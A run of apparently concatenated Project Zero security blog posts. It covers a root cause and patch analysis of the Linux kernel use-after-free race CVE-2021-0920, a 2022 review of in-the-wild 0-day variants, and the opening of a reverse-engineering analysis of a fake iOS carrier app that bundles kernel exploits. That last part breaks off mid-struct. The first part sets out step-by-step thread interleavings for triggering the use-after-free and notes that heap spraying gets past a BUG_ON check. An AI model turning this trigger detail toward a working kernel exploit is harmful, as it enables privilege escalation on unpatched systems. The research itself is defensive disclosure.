To do this, the kernel puts the candidate on the not_cycle_list instead, iterates through the receive queue of each transmitted file in the gc_candidates list (garbage.c#L281), and increments the inflight counts back. The entire process is done recursively, so that the garbage collection avoids purging reachable sockets:

/* Restore the references for children of all candidates,

 * which have remaining references.  Do this recursively, so

 * only those remain, which form cyclic references.

 *

 * Use a "cursor" link, to make the list traversal safe, even

 * though elements might be moved about.

 */

list_add(&cursor, &gc_candidates);

while (cursor.next != &gc_candidates) {

        u = list_entry(cursor.next, struct unix_sock, link);

        /* Move cursor to after the current position. */

        list_move(&cursor, &u->link);

        if (atomic_long_read(&u->inflight) > 0) {

                list_move_tail(&u->link, &not_cycle_list);

                __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);

                scan_children(&u->sk, inc_inflight_move_tail, NULL);

        }

}

list_del(&cursor);

Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).

/* Now gc_candidates contains only garbage.  Restore original

 * inflight counters for these as well, and remove the skbuffs

 * which are creating the cycle(s).

 */

skb_queue_head_init(&hitlist);

list_for_each_entry(u, &gc_candidates, link)

        scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a

 * cycle.  Restore these to the inflight list.

 */

while (!list_empty(&not_cycle_list)) {

        u = list_entry(not_cycle_list.next, struct unix_sock, link);

        __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);

        list_move_tail(&u->link, &gc_inflight_list);

}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */

__skb_queue_purge(&hitlist);

spin_lock(&unix_gc_lock);

__skb_queue_purge clears every skb from the receiver queue:

/**

 *      __skb_queue_purge - empty a list

 *      @list: list to empty

 *

 *      Delete all buffers on an &sk_buff list. Each buffer is removed from

 *      the list and one reference dropped. This function does not take the

 *      list lock and the caller must hold the relevant locks to use it.

 */

void skb_queue_purge(struct sk_buff_head *list);

static inline void __skb_queue_purge(struct sk_buff_head *list)

{

        struct sk_buff *skb;

        while ((skb = __skb_dequeue(list)) != NULL)

                kfree_skb(skb);

}

There are two ways to trigger the garbage collection process:

  1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets
  2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc.

Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation.

Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼:

  1. Socket f 00 sends socket f 00 to socket f 01.
  2. Socket f 01 sends socket f 01 to socket 𝛼.
  3. Close f 00.
  4. Close f 01.

Before starting the garbage collection process, the status of socket file descriptors are:

  • f 00: ref = 1, inflight = 1
  • f 01: ref = 1, inflight = 1
  • 𝛼: ref = 1, inflight = 0

f00, f01 and alpha form a breakable cycle.

Breakable cycle by f 00, f 01 and 𝛼

During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore.

CVE-2021-0920 Root Cause Analysis

When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge.

recvmsg without MSG_PEEK flag

The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. It calls unix_detach_fds to decrement the inflight count, and unix_detach_fds then clears the list of passed file descriptors (scm_fp_list) from the skb:

static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb)

{

        int i;

        scm->fp = UNIXCB(skb).fp;

        UNIXCB(skb).fp = NULL;

        for (i = scm->fp->count-1; i >= 0; i--)

                unix_notinflight(scm->fp->user, scm->fp->fp[i]);

}

The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

{

        struct sock *s = unix_get_socket(fp);

        spin_lock(&unix_gc_lock);

        if (s) {

                struct unix_sock *u = unix_sk(s);

                BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

                if (atomic_long_dec_and_test(&u->inflight))

                        list_del_init(&u->link);

                unix_tot_inflight--;

        }

        user->unix_inflight--;

        spin_unlock(&unix_gc_lock);

}

Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#L2451) to destroy the current skb. Following the call chain kfree_skb → __kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:

static void unix_destruct_scm(struct sk_buff *skb)

{

        struct scm_cookie scm;

        memset(&scm, 0, sizeof(scm));

        scm.pid  = UNIXCB(skb).pid;

        if (UNIXCB(skb).fp)

                unix_detach_fds(&scm, skb);

        /* Alas, it calls VFS */

        /* So fscking what? fput() had been SMP-safe since the last Summer */

        scm_destroy(&scm);

        sock_wfree(skb);

}

In fact, unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp was already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked to install a new file descriptor.

recvmsg with MSG_PEEK flag

The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):

/* It is questionable, see note in unix_dgram_recvmsg.

 */

if (UNIXCB(skb).fp)

        scm.fp = scm_fp_dup(UNIXCB(skb).fp);

sk_peek_offset_fwd(sk, chunk);

if (UNIXCB(skb).fp)

        break;

Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket.

recvmsg Examples

Let’s see a concrete example. Assume there are the following socket pairs:

  • f 00, f 01
  • f 10, f 11

Now, the program does the following operations:

  • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01)
  • f 10 → [f 00] → f 11
  • Close(f 00)

f00, f01, f10, f11 forms a breakable cycle.

Breakable cycle by f 00, f 01, f 10 and f 11

Here is the status:

  • inflight(f 00) = 2, ref(f 00) = 2
  • inflight(f 01) = 0, ref(f 01) = 1
  • inflight(f 10) = 0, ref(f 10) = 1
  • inflight(f 11) = 0, ref(f 11) = 1

If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage.

If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00:

After f01 receives the socket file descriptor by MSG_PEEK, the reference count of f00 is incremented and the receive queue from f01 remains the same.

MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared

Status:

  • inflight(f00) = 2, ref(f00) = 3
  • inflight(f01) = 0, ref(f01) = 1
  • inflight(f10) = 0, ref(f10) = 1
  • inflight(f11) = 0, ref(f11) = 1

Then f01 calls recvmsg without the MSG_PEEK flag, which removes the skb from f01’s receive queue. f01 also fetches another new file descriptor, f00'':

The receive queue of f01 is cleared and f00'' is obtained

Status:

  • inflight(f00) = 1, ref(f00) = 3
  • inflight(f01) = 0, ref(f01) = 1
  • inflight(f10) = 0, ref(f10) = 1
  • inflight(f11) = 0, ref(f11) = 1

UAF Scenario

From a very high-level perspective, the internal state of the Linux garbage collector can become inconsistent because MSG_PEEK is not synchronized with it. There is a race condition in which the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented concurrently by a MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver installs the file descriptor, leading to a use-after-free on the skb object.

Let’s see how the captured 0-day sample triggers the bug step by step (a simplified version; in reality more threads need to work together, but this demonstrates the core idea). First of all, the sample allocates the following socket pairs and a single socket 𝛼:

  • f00, f01
  • f10, f11
  • f20, f21
  • f30, f31
  • sock 𝛼 (in reality there may be thousands of 𝛼 sockets, used to prolong the garbage collection process in order to evade a BUG_ON check which will be introduced later)

Now, the program does the following operations:

Close the following file descriptors prior to any recvmsg calls:

  • Close(f00)
  • Close(f01)
  • Close(f11)
  • Close(f10)
  • Close(f30)
  • Close(f31)
  • Close(𝛼)

Here is the status:

  • inflight(f00) = N + 1, ref(f00) = N + 1
  • inflight(f01) = 2, ref(f01) = 2
  • inflight(f10) = 3, ref(f10) = 3
  • inflight(f11) = 1, ref(f11) = 1
  • inflight(f20) = 0, ref(f20) = 1
  • inflight(f21) = 0, ref(f21) = 1
  • inflight(f31) = 1, ref(f31) = 1
  • inflight(𝛼) = 1, ref(𝛼) = 1

If the garbage collection process happens now, the kernel performs the following steps:

  • List f00, f01, f10, f11, f31 and 𝛼 as garbage candidates, and decrease the inflight count for the candidate children in each receive queue.
  • Since f21 is not considered a candidate, f11’s inflight count stays above zero.
  • Recursively restore the inflight counts.
  • Nothing is considered garbage.

A potential skb UAF by race condition can be triggered by:

  1. Calling recvmsg with the MSG_PEEK flag from f21 to get f11'.
  2. Calling recvmsg with the MSG_PEEK flag from f11 to get f10'.
  3. Concurrently doing the following operations:
     a. Calling recvmsg without the MSG_PEEK flag from f11 to get f10''.
     b. Calling recvmsg with the MSG_PEEK flag from f10'.

How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:

In this interleaving, thread 0 runs the garbage collector while threads 1 and 2 issue the recvmsg calls:

  1. Thread 0: Call unix_gc.
  2. Thread 0, stage 0: List f00, f01, f10, f11, f31 and 𝛼 as garbage candidates.
  3. Thread 1: Call recvmsg with the MSG_PEEK flag from f21 to get f11'. Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);
  4. Thread 0, stage 0: Decrease the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0.
  5. Thread 0, stage 1: Recursively restore the inflight count of any candidate that still has a positive inflight count. All inflight counts have been restored.
  6. Thread 0, stage 2: No garbage; return.
  7. Thread 1: Call recvmsg with the MSG_PEEK flag from f11 to get f10'.
  8. Thread 2: Call recvmsg without the MSG_PEEK flag from f11 to get f10''.
  9. Thread 1: Call recvmsg with the MSG_PEEK flag from f10'.

Everyone is happy.

However, if the recvmsg calls race with stage 1 of the garbage collection process, the UAF is triggered:

  1. Thread 0: Call unix_gc.
  2. Thread 0, stage 0: List f00, f01, f10, f11, f31 and 𝛼 as garbage candidates.
  3. Thread 1: Call recvmsg with the MSG_PEEK flag from f21 to get f11'. Increase the reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp);
  4. Thread 0, stage 0: Decrease the inflight count for the children of every garbage candidate. Status after stage 0: inflight(f00) = 0, inflight(f01) = 0, inflight(f10) = 0, inflight(f11) = 1, inflight(f31) = 0, inflight(𝛼) = 0.
  5. Thread 0, stage 1: Start restoring the inflight counts.
  6. Thread 1: Call recvmsg with the MSG_PEEK flag from f11 to get f10'.
  7. Thread 2: Call recvmsg without the MSG_PEEK flag from f11 to get f10''. unix_detach_fds sets UNIXCB(skb).fp = NULL, then unix_notinflight blocks on spin_lock(&unix_gc_lock).
  8. Thread 0, stage 1: scan_inflight cannot find candidate children from f11, so the inflight count accidentally remains the same.
  9. Thread 0, stage 2: f00, f01, f10, f31 and 𝛼 are garbage; start purging garbage.
  10. Thread 1: Start calling recvmsg with the MSG_PEEK flag from f10', which would expect to receive f00'. Get skb = skb_peek(&sk->sk_receive_queue); this skb is about to be freed by thread 0.
  11. Thread 0, stage 2: The purge loop calls __skb_unlink and later kfree_skb on that skb.
  12. Thread 1: state->recv_actor(skb, skip, chunk, state) runs on the freed skb: UAF.
  13. Thread 0: GC finished.
  14. Thread 2: Unblocked; unix_notinflight completes, garbage collection starts, and f10'' is obtained.

Therefore, the race condition causes a UAF of the skb object. At first glance, we might blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF is avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection either has not started or has finished before the inflight count is decremented and the skb is removed. After unix_notinflight, the receiver obtains f11' and the inflight sockets no longer form an unbreakable cycle.

Since MSG_PEEK is not serialized with the garbage collection, the kernel still considers f11 a garbage candidate when recvmsg is called with MSG_PEEK set. For this reason, the next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process.

Patch Analysis

CVE-2021-0920 was found in 2016

The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided correct patch advice, but it was not accepted by the Linux kernel community:

Linux kernel developers: "Why would I apply a patch that's an RFC, doesn't have a proper commit message, lacks a proper signoff, and also lacks ACK's and feedback from other knowledgable developers?"

Patch was not applied in 2016

In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector.

Patch in 2021

Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:

+       spin_lock(&unix_gc_lock);

+       spin_unlock(&unix_gc_lock);

The patch may look confusing: it's rare to see a lock acquired and immediately released with nothing in between. Regardless, the effect is that the MSG_PEEK path now waits for any in-progress garbage collection to complete, so the UAF issue is resolved.
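For context, here is a sketch of what the fixed MSG_PEEK path looks like, modeled on the upstream fix (simplified and paraphrased, not the verbatim kernel source):

static void unix_peek_fds(struct scm_cookie *scm, struct sk_buff *skb)
{
        scm->fp = scm_fp_dup(UNIXCB(skb).fp);

        /* If a garbage collection is in progress, wait for it to finish
         * before letting the peeked fds escape to userspace. The empty
         * lock/unlock pair is enough: acquiring unix_gc_lock cannot
         * succeed until unix_gc has dropped it. */
        spin_lock(&unix_gc_lock);
        spin_unlock(&unix_gc_lock);
}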

BUG_ON Added in 2017

In 2017, Andrey Ulanov from Google found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:

void unix_notinflight(struct user_struct *user, struct file *fp)

        if (s) {

                struct unix_sock *u = unix_sk(s);

 

+               BUG_ON(!atomic_long_read(&u->inflight));

                BUG_ON(list_empty(&u->link));

 

                if (atomic_long_dec_and_test(&u->inflight))

At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code delays the garbage collection by crafting a large amount of fake garbage (a heap spray), it can sidestep the BUG_ON check.

New Garbage Collection Discovered in 2021

CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window.


Part I Conclusion

To recap, we have discussed the kernel internals of SCM_RIGHTS and the design and implementation of the Linux kernel garbage collector. We have also analyzed the behavior of the MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF through a subtle and arcane race condition.

The bug was spotted publicly in 2016, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actor who saw the public email thread had a chance to develop an LPE exploit against the Linux kernel.

In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules.

2022 0-day In-the-Wild Exploitation…so far

30 June 2022 at 13:00

Posted by Maddie Stone, Google Project Zero

This blog post is an overview of a talk, “0-day In-the-Wild Exploitation in 2022…so far”, that I gave at the FIRST conference in June 2022. The slides are available here.

For the last three years, we’ve published annual year-in-review reports of 0-days found exploited in the wild. The most recent of these reports is the 2021 Year in Review report, which we published just a few months ago in April. While we plan to stick with that annual cadence, we’re publishing a little bonus report today looking at the in-the-wild 0-days detected and disclosed in the first half of 2022.        

As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.  

Product / 2022 ITW 0-day / Variant:

  • Windows win32k: CVE-2022-21882, variant of CVE-2021-1732 (2021 itw)
  • iOS IOMobileFrameBuffer: CVE-2022-22587, variant of CVE-2021-30983 (2021 itw)
  • Windows: CVE-2022-30190 (“Follina”), variant of CVE-2021-40444 (2021 itw)
  • Chromium property access interceptors: CVE-2022-1096, variant of CVE-2016-5128 and CVE-2021-30551 (2021 itw); CVE-2022-1232 addresses the incomplete CVE-2022-1096 fix
  • Chromium v8: CVE-2022-1364, variant of CVE-2021-21195
  • WebKit: CVE-2022-22620 (“Zombie”), bug was originally fixed in 2013, patch was regressed in 2016
  • Google Pixel: CVE-2021-39793*, same bug in a different Linux subsystem (* while this CVE says 2021, the bug was patched and disclosed in 2022)
  • Atlassian Confluence: CVE-2022-26134, variant of CVE-2021-26084
  • Windows: CVE-2022-26925 (“PetitPotam”), variant of CVE-2021-36942 (patch regressed)

So, what does this mean?

When people think of 0-day exploits, they often think that these exploits are so technologically advanced that there’s no hope to catch and prevent them. The data paints a different picture. At least half of the 0-days we’ve seen so far this year are closely related to bugs we’ve seen before. Our conclusion and findings in the 2020 year-in-review report were very similar.

Many of the 2022 in-the-wild 0-days are due to the previous vulnerability not being fully patched. In the case of the Windows win32k and the Chromium property access interceptor bugs, the execution flows that the proof-of-concept exploits took were patched, but the root cause issue was not addressed: attackers were able to come back and trigger the original vulnerability through a different path. And in the case of the WebKit and Windows PetitPotam issues, the original vulnerability had previously been patched, but at some point regressed so that attackers could exploit the same vulnerability again. In the iOS IOMobileFrameBuffer bug, a buffer overflow was addressed by checking that a size was less than a certain number, but it didn’t check a minimum bound on that size. For more detailed explanations of three of the 0-days and how they relate to their variants, please see the slides from the talk.

When 0-day exploits are detected in-the-wild, it’s the failure case for an attacker. It’s a gift for us security defenders to learn as much as we can and take actions to ensure that that vector can’t be used again. The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. To do that effectively, we need correct and comprehensive fixes.

This is not to minimize the challenges faced by security teams responsible for responding to vulnerability reports. As we said in our 2020 year in review report:

Being able to correctly and comprehensively patch isn't just flicking a switch: it requires investment, prioritization, and planning. It also requires developing a patching process that balances both protecting users quickly and ensuring it is comprehensive, which can at times be in tension. While we expect that none of this will come as a surprise to security teams in an organization, this analysis is a good reminder that there is still more work to be done.

Exactly what investments are likely required depends on each unique situation, but we see some common themes around staffing/resourcing, incentive structures, process maturity, automation/testing, release cadence, and partnerships.

 

Practically, some of the following efforts can help ensure bugs are correctly and comprehensively fixed. Project Zero plans to continue to help with the following efforts, but we hope and encourage platform security teams and other independent security researchers to invest in these types of analyses as well:

  • Root cause analysis

Understanding the underlying vulnerability that is being exploited, and also trying to understand how that vulnerability may have been introduced. Performing a root cause analysis can help ensure that a fix addresses the underlying vulnerability and not just the proof-of-concept. Root cause analysis is generally a prerequisite for successful variant and patch analysis.

  • Variant analysis

Looking for other vulnerabilities similar to the reported vulnerability. This can involve looking for the same bug pattern elsewhere, more thoroughly auditing the component that contained the vulnerability, modifying fuzzers to understand why they didn’t find the vulnerability previously, etc. Most researchers find more than one vulnerability at the same time. By finding and fixing the related variants, attackers are not able to simply “plug and play” with a new vulnerability once the original is patched.

  • Patch analysis

Analyzing the proposed (or released) patch for completeness compared to the root cause vulnerability. I encourage vendors to share how they plan to address the vulnerability with the vulnerability reporter early so the reporter can analyze whether the patch comprehensively addresses the root cause of the vulnerability, alongside the vendor’s own internal analysis.

  • Exploit technique analysis

Understanding the primitive gained from the vulnerability and how it’s being used. While it’s generally industry-standard to patch vulnerabilities, mitigating exploit techniques doesn’t happen as frequently. While not every exploit technique will always be able to be mitigated, the hope is that it will become the default rather than the exception. Exploit samples will need to be shared more readily in order for vendors and security researchers to be able to perform exploit technique analysis.

Transparently sharing these analyses helps the industry as a whole as well. We publish our analyses at this repository. We encourage vendors and others to publish theirs as well. This allows developers and security professionals to better understand what the attackers already know about these bugs, which hopefully leads to even better solutions and security overall.  

The curious tale of a fake Carrier.app

23 June 2022 at 16:01

Posted by Ian Beer, Google Project Zero


NOTE: This issue, CVE-2021-30983, was fixed in iOS 15.2 in December 2021.


Towards the end of 2021 Google's Threat Analysis Group (TAG) shared an iPhone app with me:

App splash screen showing the Vodafone carrier logo and the text "My Vodafone" (not the legitimate Vodafone app)



Although this looks like the real My Vodafone carrier app available in the App Store, it didn't come from the App Store and is not the real application from Vodafone. TAG suspects that a target receives a link to this app in an SMS, after the attacker asks the carrier to disable the target's mobile data connection. The SMS claims that in order to restore mobile data connectivity, the target must install the carrier app and includes a link to download and install this fake app.


This sideloading works because the app is signed with an enterprise certificate, which can be purchased for $299 via the Apple Enterprise developer program. This program allows an eligible enterprise to obtain an Apple-signed embedded.mobileprovision file with the ProvisionsAllDevices key set. An app signed with the developer certificate embedded within that mobileprovision file can be sideloaded on any iPhone, bypassing Apple's App Store review process. While we understand that the Enterprise developer program is designed for companies to push "trusted apps" to their staff's iOS devices, in this case, it appears that it was being used to sideload this fake carrier app.


In collaboration with Project Zero, TAG has published an additional post with more details around the targeting and the actor. The rest of this blogpost is dedicated to the technical analysis of the app and the exploits contained therein.

App structure

The app is broken up into multiple frameworks. InjectionKit.framework is a generic privilege escalation exploit wrapper, exposing the primitives you'd expect (kernel memory access, entitlement injection, amfid bypasses) as well as higher-level operations like app installation, file creation and so on.


Agent.framework is partially obfuscated but, as the name suggests, seems to be a basic agent able to find and exfiltrate interesting files from the device, like the WhatsApp messages database.


Six privilege escalation exploits are bundled with this app. Five are well-known, publicly available N-day exploits for older iOS versions. The sixth is not like those others at all.


This blog post is the story of the last exploit and the month-long journey to understand it.

Something's missing? Or am I missing something?

Although all the exploits were different, five of them shared a common high-level structure: an initial phase where the kernel heap was manipulated to control object placement; then the triggering of a kernel vulnerability, followed by well-known steps to turn that into something useful, perhaps by disclosing kernel memory and then building an arbitrary kernel memory write primitive.


The sixth exploit didn't have anything like that.


Perhaps it could be triggering a kernel logic bug like Linus Henze's Fugu14 exploit, or a very bad memory safety issue which gave fairly direct kernel memory access. But neither of those seemed very plausible either. It looked, quite simply, like an iOS kernel exploit from a decade ago, except one which was first quite carefully checking that it was only running on an iPhone 12 or 13.


It contained log messages like:


  printf("Failed to prepare fake vtable: 0x%08x", ret);


which seemed to happen far earlier than the exploit could possibly have defeated mitigations like KASLR and PAC.


Shortly after that was this log message:


  printf("Waiting for R/W primitives...");


Why would you need to wait?


Then shortly after that:


  printf("Memory read/write and callfunc primitives ready!");


Up to that point the exploit made only four IOConnectCallMethod calls and there were no other obvious attempts at heap manipulation. But there was another log message which started to shed some light:


  printf("Unexpected data read from DCP: 0x%08x", v49);

DCP?

In October 2021 Adam Donenfeld tweeted this:


Screenshot of Tweet from @doadam on 11 Oct 2021, which is a retweet from @AmarSaar on 11 October 2021. The tweet from @AmarSaar reads 'So, another IOMFB vulnerability was exploited ITW (15.0.2). I bindiffed the patch and built a POC. And, because it's a great bug, I just finished writing a short blogpost with the tech details, to share this knowledge :) Check it out! https://saaramar.github.io/IOMFB_integer_overflow_poc/' and the retweet from @doadam reads 'This has been moved to the display coprocessor (DCP) starting from 15, at least on iPhone 12 (and most probably other ones as well)'.

DCP is the "Display Co-Processor" which ships with iPhone 12 and above and all M1 Macs.


There's little public information about the DCP; the most comprehensive comes from the Asahi Linux project, which is porting Linux to M1 Macs. In their August 2021 and September 2021 updates they discussed their DCP reverse-engineering efforts and the open-source DCP client written by @alyssarzg. Asahi describe the DCP like this:


On most mobile SoCs, the display controller is just a piece of hardware with simple registers. While this is true on the M1 as well, Apple decided to give it a twist. They added a coprocessor to the display engine (called DCP), which runs its own firmware (initialized by the system bootloader), and moved most of the display driver into the coprocessor. But instead of doing it at a natural driver boundary… they took half of their macOS C++ driver, moved it into the DCP, and created a remote procedure call interface so that each half can call methods on C++ objects on the other CPU!

https://asahilinux.org/2021/08/progress-report-august-2021/


The Asahi linux project reverse-engineered the API to talk to the DCP but they are restricted to using Apple's DCP firmware (loaded by iBoot) - they can't use a custom DCP firmware. Consequently their documentation is limited to the DCP RPC API with few details of the DCP internals.

Setting the stage

Before diving into DCP internals it's worth stepping back a little. What even is a co-processor in a modern, highly integrated SoC (System-on-a-Chip) and what might the consequences of compromising it be?


Years ago a co-processor would likely have been a physically separate chip. Nowadays a large number of these co-processors are integrated along with their interconnects directly onto a single die, even if they remain fairly independent systems. We can see in this M1 die shot from Tech Insights that the CPU cores in the middle and right hand side take up only around 10% of the die:

M1 die-shot from techinsights.com with possible location of DCP highlighted.

M1 die-shot from techinsights.com with possible location of DCP added

https://www.techinsights.com/blog/two-new-apple-socs-two-market-events-apple-a14-and-m1


Companies like SystemPlus perform very thorough analysis of these dies. Based on their analysis the DCP is likely the rectangular region indicated on this M1 die. It takes up around the same amount of space as the four high-efficiency cores seen in the centre, though it seems to be mostly SRAM.


With just this low-resolution image it's not really possible to say much more about the functionality or capabilities of the DCP and what level of system access it has. To answer those questions we'll need to take a look at the firmware.

My kingdom for a .dSYM!

The first step is to get the DCP firmware image. iPhones (and now M1 macs) use .ipsw files for system images. An .ipsw is really just a .zip archive and the Firmware/ folder in the extracted .zip contains all the firmware for the co-processors, modems etc. The DCP firmware is this file:



  Firmware/dcp/iphone13dcp.im4p


The im4p in this case is just a 25 byte header which we can discard:


  $ dd if=iphone13dcp.im4p of=iphone13dcp bs=25 skip=1

  $ file iphone13dcp

  iphone13dcp: Mach-O 64-bit preload executable arm64


It's a Mach-O! Running nm -a to list all symbols shows that the binary has been fully stripped:


  $ nm -a iphone13dcp

  iphone13dcp: no symbols


Function names make understanding code significantly easier. Some of the handful of strings in the exploit looked like they might reference symbols in a DCP firmware image ("M3_CA_ResponseLUT read: 0x%08x" for example), so I thought perhaps there might be a DCP firmware image where the symbols hadn't been stripped.


Since the firmware images are distributed as .zip files and Apple's servers support range requests, with a bit of Python and the partialzip tool we can relatively easily and quickly download every beta and release DCP firmware. I checked over 300 distinct images; every single one was stripped.


Guess we'll have to do this the hard way!

Day 1; Instruction 1

$ otool -h raw_fw/iphone13dcp

raw_fw/iphone13dcp:

Mach header

magic      cputype   cpusubtype caps filetype ncmds sizeofcmds flags

0xfeedfacf 0x100000C 0          0x00 5        5     2240       0x00000001


That cputype is plain arm64 (ArmV8) without pointer authentication support. The binary is fairly large (3.7MB) and IDA's autoanalysis detects over 7000 functions.


With any brand new binary I usually start with a brief look through the function names and the strings. The binary is stripped so there are no function name symbols but there are plenty of C++ function names as strings:


A short list of C++ prototypes like IOMFB::UPBlock_ALSS::init(IOMFB::UPPipe *).

The cross-references to those strings look like this:


log(0x40000001LL,

    "UPBlock_ALSS.cpp",

    341,

    "%s: capture buffer exhausted, aborting capture\n",

    "void IOMFB::UPBlock_ALSS::send_data(uint64_t, uint32_t)");


This is almost certainly a logging macro which expands __FILE__, __LINE__ and __PRETTY_FUNCTION__. This allows us to start renaming functions and finding vtable pointers.
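A plausible reconstruction of that logging macro, purely as an illustration (the macro name, the log() signature and the flag value's meaning are assumptions based on the call sites), would be:

/* Hypothetical reconstruction of the firmware's logging macro. */
#define LOG(fmt, ...)                        \
    log(0x40000001LL,                        \
        __FILE__,                            \
        __LINE__,                            \
        fmt,                                 \
        __PRETTY_FUNCTION__, ##__VA_ARGS__)

/* A call like LOG("%s: capture buffer exhausted, aborting capture\n")
 * then expands to exactly the argument pattern in the decompiled code,
 * with the "%s" consuming __PRETTY_FUNCTION__. */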

Object structure

From the Asahi linux blog posts we know that the DCP is using an Apple-proprietary RTOS called RTKit for which there is very little public information. There are some strings in the binary with the exact version:


ADD  X8, X8, #aLocalIphone13d@PAGEOFF ; "local-iphone13dcp.release"

ADD  X9, X9, #aRtkitIos182640@PAGEOFF ; "RTKit_iOS-1826.40.9.debug"


The code appears to be predominantly C++. There appear to be multiple C++ object hierarchies; those involved with this vulnerability look a bit like IOKit C++ objects. Their common base class looks like this:


struct __cppobj RTKIT_RC_RTTI_BASE

{

  RTKIT_RC_RTTI_BASE_vtbl *__vftable /*VFT*/;

  uint32_t refcnt;

  uint32_t typeid;

};


(These structure definitions are in the format IDA uses for C++-like objects)


The RTKit base class has a vtable pointer, a reference count and a four-byte Run Time Type Information (RTTI) field - a 4-byte ASCII identifier like BLHA, WOLO, MMAP, UNPI, OSST, OSBO and so on. These identifiers look a bit cryptic but they're quite descriptive once you figure them out (and I'll describe the relevant ones as we encounter them.)
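These four-byte identifiers are just 32-bit integers built from ASCII bytes. A small standalone helper (my own sketch, not firmware code) shows the packing that multi-character constants like 'BLHA' in the decompiled code rely on:

#include <stdint.h>
#include <stdio.h>

/* Pack a 4-character ASCII tag such as "BLHA" into a uint32_t, matching
 * the value of the multi-character constant 'BLHA' on clang/gcc. */
static uint32_t fourcc(const char s[4])
{
    return ((uint32_t)s[0] << 24) | ((uint32_t)s[1] << 16) |
           ((uint32_t)s[2] << 8)  |  (uint32_t)s[3];
}

static void print_typeid(uint32_t id)
{
    printf("%c%c%c%c\n", id >> 24, (id >> 16) & 0xff,
           (id >> 8) & 0xff, id & 0xff);
}

int main(void)
{
    uint32_t id = fourcc("BLHA");   /* 0x424C4841 */
    print_typeid(id);               /* prints "BLHA" */
    return 0;
}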


The base type has the following associated vtable:


struct /*VFT*/ RTKIT_RC_RTTI_BASE_vtbl

{

  void (__cdecl *take_ref)(RTKIT_RC_RTTI_BASE *this);

  void (__cdecl *drop_ref)(RTKIT_RC_RTTI_BASE *this);

